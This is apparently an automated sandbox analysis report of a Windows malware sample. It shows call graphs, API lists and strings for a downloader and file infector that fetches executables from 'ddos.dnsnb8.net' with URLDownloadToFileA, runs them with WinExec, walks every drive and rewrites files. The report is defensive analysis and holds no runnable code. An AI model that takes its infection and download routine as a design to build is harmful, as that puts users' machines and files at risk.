                                                execution_graph 876 6114e1 877 611541 876->877 878 6114fd GetModuleHandleA 876->878 881 611573 877->881 882 611549 877->882 879 611512 878->879 880 61151a VirtualQuery 878->880 879->877 880->879 887 611638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 881->887 883 611566 882->883 904 611af9 882->904 885 611579 ExitProcess 888 61167a 887->888 889 61167f 887->889 922 61139f GetVersionExA 888->922 910 611718 GetSystemTimeAsFileTime 889->910 892 611686 893 6116ca 892->893 896 6116a0 CreateThread 892->896 894 6116d0 893->894 895 6116d7 893->895 943 611581 894->943 898 6116dd lstrcpy 895->898 899 61170f 895->899 915 612c48 memset 896->915 1159 611099 896->1159 898->885 899->885 903 611718 3 API calls 903->893 905 611b11 904->905 906 611b09 904->906 907 611b16 CreateThread 905->907 909 611b0f 905->909 908 611638 188 API calls 906->908 907->909 1177 611638 189 API calls 907->1177 908->909 909->883 911 611735 SHSetValueA 910->911 912 611754 910->912 914 611786 __aulldiv 911->914 913 61175a SHGetValueA 912->913 912->914 913->914 914->892 949 611973 PathFileExistsA 915->949 918 612cb2 920 6116ba WaitForSingleObject 918->920 921 612cbb VirtualFree 918->921 919 612c8f CreateThread WaitForMultipleObjects 919->918 971 612b8c memset GetLogicalDriveStringsA 919->971 920->903 921->920 923 6114da 922->923 924 6113cf LookupPrivilegeValueA 922->924 923->889 925 6113ef 924->925 926 6113e7 924->926 925->923 1144 61120e GetModuleHandleA GetProcAddress 925->1144 1139 61119f GetCurrentProcess OpenProcessToken 926->1139 932 611448 GetCurrentProcessId 932->923 933 611457 932->933 933->923 934 611319 3 API calls 933->934 935 61147f 934->935 936 611319 3 API calls 935->936 937 61148e 936->937 937->923 938 611319 3 API calls 937->938 939 6114b4 938->939 940 611319 3 API calls 939->940 941 6114c3 940->941 942 611319 3 API calls 941->942 942->923 1158 61185b GetSystemTimeAsFileTime srand rand srand rand 943->1158 945 611592 wsprintfA wsprintfA lstrlen CreateFileA 946 611633 945->946 947 6115fb WriteFile CloseHandle 945->947 946->899 947->946 948 61161d ShellExecuteA 947->948 948->946 950 6119a0 949->950 952 611ac7 949->952 951 6119af CreateFileA 950->951 953 6119c4 Sleep 951->953 954 611a28 GetFileSize 951->954 952->918 952->919 953->951 955 6119d5 953->955 956 611a38 954->956 967 611a80 954->967 970 61185b GetSystemTimeAsFileTime srand rand srand rand 955->970 960 611a3d VirtualAlloc 956->960 956->967 957 611a96 961 611aad 957->961 962 611a9c DeleteFileA 957->962 958 611a8d FindCloseChangeNotification 958->957 964 611a53 960->964 960->967 961->952 969 611ab8 VirtualFree 961->969 962->961 963 6119da wsprintfA CopyFileA 963->954 966 611a0d CreateFileA 963->966 964->967 968 611a59 ReadFile 964->968 966->954 966->962 967->957 967->958 968->964 968->967 969->952 970->963 972 612c09 WaitForMultipleObjects 971->972 973 612bc8 971->973 975 612c2a CreateThread 972->975 976 612c3c 972->976 974 612bfa lstrlen 973->974 977 612bd2 GetDriveTypeA 973->977 978 612be3 CreateThread 973->978 974->972 974->973 975->976 982 612845 975->982 977->973 977->974 978->974 979 612b7d 978->979 992 6129e2 memset wsprintfA 979->992 1129 61274a memset memset SHGetSpecialFolderPathA wsprintfA 982->1129 984 612878 DeleteFileA 986 61289a 984->986 987 61288c VirtualFree 984->987 985 612853 985->984 990 612692 8 API calls 985->990 991 61239d 186 API calls 985->991 988 6128a4 CloseHandle 986->988 989 6128ab 986->989 987->986 988->989 990->985 991->985 993 612a3a memset lstrlen lstrcpyn strrchr 992->993 994 612abc memset memset FindFirstFileA 992->994 993->994 995 612a88 993->995 1006 6128b8 memset wsprintfA 994->1006 995->994 997 612a9a lstrcmpiA 995->997 999 612b74 997->999 1000 612aad lstrlen 997->1000 1000->994 1000->997 1001 612b61 FindNextFileA 1002 612b23 1001->1002 1003 612b6d FindClose 1001->1003 1004 612b35 lstrcmpiA 1002->1004 1005 6128b8 174 API calls 1002->1005 1003->999 1004->1002 1004->1003 1005->1001 1007 612905 1006->1007 1014 612951 memset 1006->1014 1008 612956 strrchr 1007->1008 1009 61291b memset wsprintfA 1007->1009 1007->1014 1011 612967 lstrcmpiA 1008->1011 1008->1014 1010 6129e2 180 API calls 1009->1010 1010->1014 1012 612988 lstrcmpiA 1011->1012 1013 61297a 1011->1013 1012->1014 1016 612994 1012->1016 1024 611e6e 1013->1024 1014->1001 1017 6129ad strstr 1016->1017 1018 6129a5 lstrcpy 1016->1018 1019 6129d3 1017->1019 1020 6129cb 1017->1020 1018->1017 1089 612692 1019->1089 1067 61239d strstr 1020->1067 1025 611e7d 1024->1025 1098 611df6 strrchr 1025->1098 1028 611eb0 SetFileAttributesA CreateFileA 1029 612332 1028->1029 1030 611edf 1028->1030 1032 612346 1029->1032 1033 61233d UnmapViewOfFile 1029->1033 1103 611915 1030->1103 1034 612350 1032->1034 1035 61234b FindCloseChangeNotification 1032->1035 1033->1032 1037 612391 1034->1037 1038 612356 FindCloseChangeNotification 1034->1038 1035->1034 1037->1014 1038->1037 1039 611f2e 1039->1029 1109 611c81 1039->1109 1043 611f92 1044 611c81 2 API calls 1043->1044 1045 611f9f 1044->1045 1045->1029 1046 611af9 169 API calls 1045->1046 1047 612024 1045->1047 1051 611fc0 1046->1051 1047->1029 1048 611af9 169 API calls 1047->1048 1049 61207a 1048->1049 1050 611af9 169 API calls 1049->1050 1055 612090 1050->1055 1051->1029 1051->1047 1052 611af9 169 API calls 1051->1052 1053 611ffe 1052->1053 1054 612013 FlushViewOfFile 1053->1054 1054->1047 1056 6120bb memset memset 1055->1056 1057 6120f5 1056->1057 1058 611c81 2 API calls 1057->1058 1059 6121de 1058->1059 1060 612226 memcpy UnmapViewOfFile CloseHandle 1059->1060 1114 611b8a 1060->1114 1062 61226e 1122 61185b GetSystemTimeAsFileTime srand rand srand rand 1062->1122 1064 6122ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1065 611915 3 API calls 1064->1065 1066 61231f CloseHandle 1065->1066 1066->1029 1068 612451 CreateFileA GetFileSize 1067->1068 1073 6123d8 1067->1073 1069 612480 1068->1069 1070 612675 CloseHandle 1068->1070 1069->1070 1074 612499 1069->1074 1071 61267c RemoveDirectoryA 1070->1071 1072 612687 1071->1072 1072->1014 1073->1068 1073->1072 1075 611915 3 API calls 1074->1075 1076 6124a4 9 API calls 1075->1076 1124 61189d memset CreateProcessA 1076->1124 1079 61255c Sleep memset wsprintfA 1080 6129e2 163 API calls 1079->1080 1081 612597 memset wsprintfA Sleep 1080->1081 1082 61189d 6 API calls 1081->1082 1083 6125e4 Sleep CreateFileA 1082->1083 1084 611915 3 API calls 1083->1084 1085 612610 CloseHandle 1084->1085 1085->1071 1086 61261e 1085->1086 1086->1071 1087 612641 SetFilePointer WriteFile 1086->1087 1087->1071 1088 612667 SetEndOfFile 1087->1088 1088->1071 1090 6126b2 WaitForSingleObject 1089->1090 1091 6126a2 CreateEventA 1089->1091 1092 6126c1 lstrlen ??2@YAPAXI 1090->1092 1093 612708 1090->1093 1091->1090 1094 612736 SetEvent 1092->1094 1095 6126da lstrcpy 1092->1095 1093->1094 1097 612718 lstrcpy ??3@YAXPAX 1093->1097 1094->1014 1096 6126f1 1095->1096 1096->1094 1097->1096 1099 611e13 lstrcpy strrchr 1098->1099 1101 611e62 1098->1101 1100 611e40 lstrcmpiA 1099->1100 1099->1101 1100->1101 1102 611e52 lstrlen 1100->1102 1101->1028 1101->1029 1102->1100 1102->1101 1104 611928 1103->1104 1105 611924 SetFilePointer CreateFileMappingA MapViewOfFile 1103->1105 1106 61194f 1104->1106 1107 61192e memset GetFileTime 1104->1107 1105->1029 1105->1039 1106->1105 1108 611954 SetFileTime 1106->1108 1107->1105 1108->1105 1110 611c94 1109->1110 1111 611c9c 1109->1111 1110->1029 1113 61185b GetSystemTimeAsFileTime srand rand srand rand 1110->1113 1111->1110 1112 611cae memset memset 1111->1112 1112->1110 1113->1043 1115 611b93 1114->1115 1123 61185b GetSystemTimeAsFileTime srand rand srand rand 1115->1123 1117 611bca srand 1118 611bd8 rand 1117->1118 1119 611c08 1118->1119 1119->1118 1120 611c29 memset memcpy lstrcat 1119->1120 1120->1062 1122->1064 1123->1117 1125 6118e0 CloseHandle WaitForSingleObject 1124->1125 1126 61190c 1124->1126 1127 611907 CloseHandle 1125->1127 1128 6118fb GetExitCodeProcess 1125->1128 1126->1071 1126->1079 1127->1126 1128->1127 1138 61185b GetSystemTimeAsFileTime srand rand srand rand 1129->1138 1131 6127b5 wsprintfA CopyFileA 1132 612840 1131->1132 1133 6127de wsprintfA 1131->1133 1132->985 1134 611973 17 API calls 1133->1134 1135 61280f 1134->1135 1136 612820 CreateFileA 1135->1136 1137 612813 DeleteFileA 1135->1137 1136->1132 1137->1136 1138->1131 1140 611200 CloseHandle 1139->1140 1141 6111c6 AdjustTokenPrivileges 1139->1141 1140->925 1142 6111f7 CloseHandle 1141->1142 1143 6111f6 1141->1143 1142->1140 1143->1142 1145 611310 1144->1145 1146 61123f GetCurrentProcessId OpenProcess 1144->1146 1145->923 1153 611319 1145->1153 1146->1145 1150 611262 1146->1150 1147 6112b0 VirtualAlloc 1147->1150 1152 6112b8 1147->1152 1148 6112f1 CloseHandle 1148->1145 1149 611302 VirtualFree 1148->1149 1149->1145 1150->1147 1150->1148 1151 611296 VirtualFree 1150->1151 1150->1152 1151->1147 1152->1148 1154 61134a 1153->1154 1155 61132a GetModuleHandleA GetProcAddress 1153->1155 1156 611351 memset 1154->1156 1157 611363 1154->1157 1155->1154 1155->1157 1156->1157 1157->923 1157->932 1158->945 1160 611196 1159->1160 1161 6110ba 1159->1161 1161->1160 1168 61185b GetSystemTimeAsFileTime srand rand srand rand 1161->1168 1163 611118 wsprintfA wsprintfA URLDownloadToFileA 1164 611168 lstrlen Sleep 1163->1164 1165 6110dc 1163->1165 1164->1161 1169 611000 CreateFileA 1165->1169 1168->1163 1170 611092 WinExec lstrlen 1169->1170 1171 611025 GetFileSize CreateFileMappingA MapViewOfFile 1169->1171 1170->1160 1170->1161 1172 61107b 1171->1172 1175 611057 1171->1175 1173 611087 CloseHandle 1172->1173 1174 61108d CloseHandle 1172->1174 1173->1174 1174->1170 1176 611074 UnmapViewOfFile 1175->1176 1176->1172 1192 612361 1193 612374 1192->1193 1194 61236b UnmapViewOfFile 1192->1194 1195 612382 1193->1195 1196 612379 CloseHandle 1193->1196 1194->1193 1197 612391 1195->1197 1198 612388 CloseHandle 1195->1198 1196->1195 1198->1197 1178 616076 1179 6160c7 1178->1179 1180 61607b 1178->1180 1181 61615f VirtualFree 1179->1181 1183 616198 VirtualFree 1179->1183 1184 6160d5 VirtualAlloc 1179->1184 1180->1179 1182 6160b0 VirtualAlloc 1180->1182 1190 6161b2 1180->1190 1181->1179 1182->1179 1183->1190 1184->1179 1185 616389 VirtualProtect 1188 6163b7 1185->1188 1186 6163fc VirtualProtect 1187 616418 1186->1187 1188->1186 1189 6163e7 VirtualProtect 1188->1189 1189->1186 1189->1188 1190->1185 1191 6162fb 1190->1191

                                                Callgraph

                                                • Executed
                                                • Not Executed
                                                • Opacity -> Relevance
                                                • Disassembly available
                                                callgraph 0 Function_006114E1 12 Function_00611AF9 0->12 29 Function_00611638 0->29 1 Function_00612361 48 Function_00612D9B 1->48 2 Function_00612D60 3 Function_00616B63 23 Function_006167A4 3->23 25 Function_006169B0 3->25 26 Function_00616834 3->26 4 Function_006129E2 28 Function_006128B8 4->28 5 Function_00611C68 6 Function_00611E6E 6->2 6->5 11 Function_00611DF6 6->11 6->12 20 Function_0061185B 6->20 31 Function_00611C81 6->31 37 Function_00611D8A 6->37 38 Function_00611B8A 6->38 44 Function_00611915 6->44 6->48 7 Function_00612CF0 8 Function_00611973 8->20 9 Function_00616CF2 13 Function_00616CF8 9->13 10 Function_00616076 17 Function_006166C8 10->17 12->29 14 Function_00612B7D 14->4 15 Function_00612845 18 Function_0061274A 15->18 43 Function_00612692 15->43 49 Function_0061239D 15->49 16 Function_00612C48 16->8 40 Function_00612B8C 16->40 34 Function_00616D00 17->34 35 Function_00616B02 17->35 36 Function_00616A84 17->36 18->8 18->20 19 Function_006117D0 21 Function_0061235D 22 Function_0061605E 24 Function_006165A6 27 Function_00616734 27->34 27->35 27->36 28->4 28->6 28->43 28->49 29->16 29->19 32 Function_00611581 29->32 45 Function_00611099 29->45 47 Function_00611718 29->47 52 Function_0061139F 29->52 30 Function_00616001 39 Function_0061600A 30->39 32->20 33 Function_00611000 33->19 34->3 34->9 34->25 35->3 36->9 41 Function_0061680F 36->41 38->20 40->14 40->15 42 Function_0061120E 45->20 45->33 46 Function_00611319 47->7 49->4 49->44 50 Function_0061189D 49->50 51 Function_0061119F 52->42 52->46 52->51

                                                Executed Functions

                                                Function 006129E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128stringfileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 101 6129e2-612a34 memset wsprintfA 102 612a3a-612a86 memset lstrlen lstrcpyn strrchr 101->102 103 612abc-612b21 memset * 2 FindFirstFileA call 6128b8 memset 101->103 102->103 104 612a88-612a98 102->104 110 612b61-612b6b FindNextFileA 103->110 104->103 106 612a9a-612aa7 lstrcmpiA 104->106 108 612b74-612b7a 106->108 109 612aad-612aba lstrlen 106->109 109->103 109->106 111 612b23-612b2a 110->111 112 612b6d-612b6e FindClose 110->112 113 612b4c-612b5c call 6128b8 111->113 114 612b2c-612b33 111->114 112->108 113->110 114->113 115 612b35-612b4a lstrcmpiA 114->115 115->112 115->113
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                                • String ID: %s*$C:\$Documents and Settings
                                                • API String ID: 2826467728-110786608
                                                • Opcode ID: c28782c76d0151406301db8eb819f0bcfa0fda903783e04df2321965597381b4
                                                • Instruction ID: 36a9edbd0ef466ab30e62cd0397264d21bed5f24fd678e045e9ef842dd68c828
                                                • Opcode Fuzzy Hash: c28782c76d0151406301db8eb819f0bcfa0fda903783e04df2321965597381b4
                                                • Instruction Fuzzy Hash: 2C4186B240434AAFD720DFA0DC89DDB77EDEB84315F08482AF545D3211E634D69887A6
                                                Function 00611099 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 74stringsleepprocessCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 172 611099-6110b4 173 611199-61119c 172->173 174 6110ba-6110c7 172->174 175 6110c8-6110d4 174->175 176 611184-611190 175->176 177 6110da 175->177 176->175 178 611196-611198 176->178 179 611113-611162 call 61185b wsprintfA * 2 URLDownloadToFileA 177->179 178->173 182 611168-611182 lstrlen Sleep 179->182 183 6110dc-61110d call 611000 WinExec lstrlen 179->183 182->176 182->179 183->178 183->179
                                                APIs
                                                  • Part of subcall function 0061185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75A78400,http://%s:%d/%s/%s,?,?,?,00611118), ref: 00611867
                                                  • Part of subcall function 0061185B: srand.MSVCRT ref: 00611878
                                                  • Part of subcall function 0061185B: rand.MSVCRT ref: 00611880
                                                  • Part of subcall function 0061185B: srand.MSVCRT ref: 00611890
                                                  • Part of subcall function 0061185B: rand.MSVCRT ref: 00611894
                                                • WinExec.KERNEL32(?,00000005), ref: 006110F1
                                                • lstrlen.KERNEL32(00614748), ref: 006110FA
                                                • wsprintfA.USER32 ref: 0061112A
                                                • wsprintfA.USER32 ref: 00611143
                                                • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0061115B
                                                • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00611169
                                                • Sleep.KERNELBASE ref: 00611179
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                                                • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HGa$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                • API String ID: 1280626985-3133690350
                                                • Opcode ID: dd811f5023a791330159270864cd53e628209eaa8919bc64cd325d1460f8777b
                                                • Instruction ID: 4955d13efe3e3bd299cfcc4b9f6dcdb8bf949d15c8c180b90fe6533efed0e477
                                                • Opcode Fuzzy Hash: dd811f5023a791330159270864cd53e628209eaa8919bc64cd325d1460f8777b
                                                • Instruction Fuzzy Hash: C421A175900218BACB20DBA0DC45BEEBBBFAB16316F1D8096E601A7150DB745BC4CFA0
                                                Function 00611718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65timeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 205 611718-611733 GetSystemTimeAsFileTime 206 611735-611752 SHSetValueA 205->206 207 611754-611758 205->207 208 6117c6-6117cd 206->208 207->208 209 61175a-611784 SHGetValueA 207->209 209->208 210 611786-6117b3 call 612cf0 * 2 209->210 210->208 215 6117b5 210->215 216 6117b7-6117bd 215->216 217 6117bf 215->217 216->208 216->217 217->208
                                                APIs
                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\vXQpuA.exe), ref: 00611729
                                                • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 0061174C
                                                • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 0061177C
                                                • __aulldiv.LIBCMT ref: 00611796
                                                • __aulldiv.LIBCMT ref: 006117A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: TimeValue__aulldiv$FileSystem
                                                • String ID: C:\Users\user\AppData\Local\Temp\vXQpuA.exe$SOFTWARE\GTplus$Time
                                                • API String ID: 541852442-2972129706
                                                • Opcode ID: 53d6569b406a5c48a8f7f71cef2960f4751b77c2b8bd2883aedb7160c65e90b9
                                                • Instruction ID: 6bc131a6a4fe29481fbab03d04caf538678dbf6b995c0e8f1b879f62585c7812
                                                • Opcode Fuzzy Hash: 53d6569b406a5c48a8f7f71cef2960f4751b77c2b8bd2883aedb7160c65e90b9
                                                • Instruction Fuzzy Hash: 9E115B75A00219BBDF109B94CC86FEF7BBEEB45B14F148115FA01F6380D6719A84C764
                                                Function 00616076 Relevance: 11.1, APIs: 7, Instructions: 616memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 218 616076-616079 219 6160e0-6160eb 218->219 220 61607b-616080 218->220 223 6160ee-6160f4 219->223 221 616082-616085 220->221 222 6160f7-6160f8 220->222 224 6160f6 221->224 227 616087 221->227 225 6160fa-6160fc call 6166c8 222->225 226 6160fe-616106 222->226 223->224 224->222 225->226 229 616155-616189 VirtualFree 226->229 230 616108-61611d 226->230 227->223 231 616089-616095 227->231 236 61618c-616192 229->236 233 61611f-616121 230->233 234 6160a1-6160aa 231->234 235 616097-61609f 231->235 237 616151-616154 233->237 238 616123 233->238 239 6160b0-6160c1 VirtualAlloc 234->239 240 6161ba-6161c8 234->240 235->234 241 6160c7-6160cf 236->241 242 616198-6161b0 VirtualFree 236->242 237->229 238->237 245 616125-616128 238->245 239->241 243 616243-616251 240->243 244 6161ca-6161d7 240->244 241->236 252 6160d5-6160df VirtualAlloc 241->252 242->240 248 6161b2-6161b4 242->248 246 616253 243->246 247 616264-61626f 243->247 249 6161dd-6161e0 244->249 250 616134-61613b 245->250 251 61612a-61612e 245->251 253 616255-616258 246->253 254 616271-616276 247->254 248->240 249->243 255 6161e2-6161f2 249->255 262 616130-616132 250->262 263 61613d-61614f 250->263 251->250 251->262 252->219 253->247 258 61625a-616262 253->258 259 616389-6163b1 VirtualProtect 254->259 260 61627c-616289 254->260 261 6161f5-6161fe 255->261 258->253 266 6163b7-6163ba 259->266 277 616292-616298 260->277 278 61628b 260->278 264 616200-616203 261->264 265 61620c-616219 261->265 262->233 263->233 268 616205-616208 264->268 269 61621b-616228 264->269 270 616238-61623f 265->270 271 6163fc-616416 VirtualProtect 266->271 272 6163bc-6163c2 266->272 279 61622a-616236 268->279 280 61620a 268->280 269->270 270->261 274 616241 270->274 275 616420-616425 271->275 276 616418-61641d 271->276 272->272 273 6163c4 272->273 273->271 281 6163c6-6163cf 273->281 274->249 282 6162a2-6162ac 277->282 278->277 279->270 280->270 283 6163d1 281->283 284 6163d4-6163d8 281->284 285 6162b1-6162c8 282->285 286 6162ae 282->286 283->284 289 6163da 284->289 290 6163dd-6163e1 284->290 287 616373-616384 285->287 288 6162ce-6162d4 285->288 286->285 287->254 291 6162d6-6162d9 288->291 292 6162da-6162f1 288->292 289->290 293 6163e3 290->293 294 6163e7-6163fa VirtualProtect 290->294 291->292 296 6162f3-6162f9 292->296 297 616365-61636e 292->297 293->294 294->266 294->271 298 616314-616326 296->298 299 6162fb-61630f 296->299 297->282 301 616328-61634a 298->301 302 61634c-616360 298->302 300 616426-6164a9 299->300 310 616519-61651c 300->310 311 6164ab-6164c0 300->311 301->297 302->300 312 616583-616587 310->312 313 61651d-61651e 310->313 317 6164c2 311->317 318 616535-616537 311->318 315 616588-61658b 312->315 316 616522-616533 313->316 319 6165a1-6165a3 315->319 320 61658d-61658f 315->320 316->318 323 6164c5-6164cd 317->323 324 6164f8 317->324 321 616539 318->321 322 61659a 318->322 327 616591-616593 320->327 328 6165b4 321->328 329 61653b-616541 321->329 330 61659b-61659d 322->330 331 616542-616545 323->331 332 6164cf-6164d4 323->332 325 6164fa-6164fe 324->325 326 61656c-61656f 324->326 334 616500 325->334 335 616572 325->335 326->335 327->330 336 616595 327->336 333 6165be-6165db 328->333 329->331 330->327 337 61659f 330->337 338 61654d-616550 331->338 339 616517-616518 332->339 340 6164d6-6164d9 332->340 343 6165dd-6165f6 333->343 334->316 344 616502 334->344 345 616573-616576 335->345 336->322 337->315 338->333 341 616552-616556 338->341 339->310 340->338 342 6164db-6164f5 340->342 346 616578-61657a 341->346 347 616558-616569 341->347 342->324 348 6165f7-616608 343->348 344->345 349 616504-616513 344->349 345->346 346->343 350 61657c 346->350 347->326 349->318 351 616515 349->351 350->348 352 61657e-61657f 350->352 351->339 352->312
                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,00001800,00001000,00000004), ref: 006160BE
                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 006160DF
                                                • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00616189
                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 006161A5
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: Virtual$AllocFree
                                                • String ID:
                                                • API String ID: 2087232378-0
                                                • Opcode ID: 02dc5fe221819462dfd5e064bdceb7b5f392faf15b45c933a697e7e25efb7faa
                                                • Instruction ID: bd72c008df2b22384575577a27fc67ead3e1937aa41c4a1304f0da879fa0050a
                                                • Opcode Fuzzy Hash: 02dc5fe221819462dfd5e064bdceb7b5f392faf15b45c933a697e7e25efb7faa
                                                • Instruction Fuzzy Hash: 741245B65087859FDB32CF64CC45BEA3BB2EF02310F1C45ADE8898B293D674A981C755
                                                Function 00612B8C Relevance: 10.6, APIs: 7, Instructions: 74threadstringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 353 612b8c-612bc6 memset GetLogicalDriveStringsA 354 612c09-612c28 WaitForMultipleObjects 353->354 355 612bc8-612bcc 353->355 358 612c2a-612c3a CreateThread 354->358 359 612c3c-612c45 354->359 356 612bfa-612c07 lstrlen 355->356 357 612bce-612bd0 355->357 356->354 356->355 357->356 360 612bd2-612bdc GetDriveTypeA 357->360 358->359 360->356 361 612bde-612be1 360->361 361->356 362 612be3-612bf6 CreateThread 361->362 362->356
                                                APIs
                                                • memset.MSVCRT ref: 00612BA6
                                                • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00612BB4
                                                • GetDriveTypeA.KERNELBASE(?), ref: 00612BD3
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00612BEE
                                                • lstrlen.KERNEL32(?), ref: 00612BFB
                                                • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00612C16
                                                • CreateThread.KERNEL32(00000000,00000000,00612845,00000000,00000000,00000000), ref: 00612C3A
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                                                • String ID:
                                                • API String ID: 1073171358-0
                                                • Opcode ID: f7e84ee5a88acd26e701878d9f84075548c5d70e74a725a1a5055a977728831a
                                                • Instruction ID: f267273a0d1b7a750d8bf8fbafc0be1d5d27e687dc2846714e68709378deae18
                                                • Opcode Fuzzy Hash: f7e84ee5a88acd26e701878d9f84075548c5d70e74a725a1a5055a977728831a
                                                • Instruction Fuzzy Hash: 8421D5B180015EAFEB209F64AC84DEF7BAFFB08349B1D012AF94293251D7208D56CB60
                                                Function 00611E6E Relevance: 44.1, APIs: 20, Strings: 5, Instructions: 380fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
